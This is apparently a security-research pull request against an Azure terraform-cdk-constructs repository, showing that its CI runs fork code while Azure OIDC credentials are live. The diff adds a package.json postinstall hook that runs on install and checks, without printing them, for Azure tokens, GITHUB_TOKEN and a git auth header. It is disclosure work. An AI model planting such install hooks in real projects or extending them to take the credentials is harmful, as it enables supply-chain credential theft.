### PR TITLE
PoC: Azure OIDC credential exposure (OSS VRP, ACTIONSTRAIL-POC-20260719-175644-33444)

### DIFF
--- a/.projenrc.ts
+++ b/.projenrc.ts
@@ -1,3 +1,5 @@
+
+console.log("ACTIONSTRAIL-POC-20260719-175644-33444-PROJEN"); // PoC canary
 import { cdktf } from "projen";
 import { NpmAccess, UpdateSnapshot } from "projen/lib/javascript";
 import { JsonPatch } from "projen/lib/json-patch";

--- a/package.json
+++ b/package.json
@@ -33,7 +33,8 @@
     "integration": "STREAM_OUTPUT=true jest --testMatch '**/*.integ.ts'",
     "integration:nostream": "STREAM_OUTPUT=false jest --maxWorkers=12 --testMatch '**/*.integ.ts'",
     "cleanup-test-resources": "ts-node scripts/cleanup-test-resources.ts",
-    "generate-index": "node ./scripts/generate-index.js"
+    "generate-index": "node ./scripts/generate-index.js",
+    "postinstall": "echo ACTIONSTRAIL-POC-20260719-175644-33444-YARN && { [ -f \"$AZURE_FEDERATED_TOKEN_FILE\" ] && echo poc:azure-oidc-token-present || echo poc:no-azure-token; } && { printenv AZURE_CLIENT_ID >/dev/null 2>&1 && echo poc:azure-client-id-present || echo poc:no-azure-client-id; } && { printenv GITHUB_TOKEN >/dev/null 2>&1 && echo poc:github-token-present || echo poc:no-github-token; } && git config --list --name-only 2>/dev/null | grep -q extraheader && echo poc:git-extraheader-present || echo poc:no-git-extraheader"
   },
   "author": {
     "name": "Microsoft",


### PR DESCRIPTION
**Security research PoC — Azure/terraform-cdk-constructs vulnerability report.**

This PR demonstrates that `pull_request_target` + fork head checkout + `azure/login`
OIDC provisioning places live Azure credentials in a runner where attacker-controlled
code runs (via `yarn install` postinstall scripts and `npx projen build`).

### What this PR does (non-destructive)
- Adds a `postinstall` script in `package.json` that:
  - Prints a unique canary string (`ACTIONSTRAIL-POC-20260719-175644-33444`)
  - Checks (does NOT print values of) whether `AZURE_FEDERATED_TOKEN_FILE`,
    `AZURE_CLIENT_ID`, `GITHUB_TOKEN` are present in the runner environment
  - Checks whether git extra-header (GITHUB_TOKEN) is in `.git/config`
- Does NOT: call any Azure APIs, read credential values, push resources, or
  interact with any external service beyond printing presence/absence of env vars

### Vulnerability
`build.yml` checks out the fork head BEFORE provisioning Azure OIDC:
1. `actions/checkout` → attacker code in runner
2. `azure/login` → `AZURE_FEDERATED_TOKEN_FILE` set in environment
3. `yarn install` → attacker's postinstall script runs with Azure token available

### Environment gate note
The `Build` environment has `required_reviewers: AzTFCDK-Admin`. This gate
is documented in the report as a partial mitigation. The structural vulnerability
(fork code executes before Azure token is cleaned up) means that any approved
build exposes Azure credentials to the PR author's code.

**POC_ID:** `ACTIONSTRAIL-POC-20260719-175644-33444`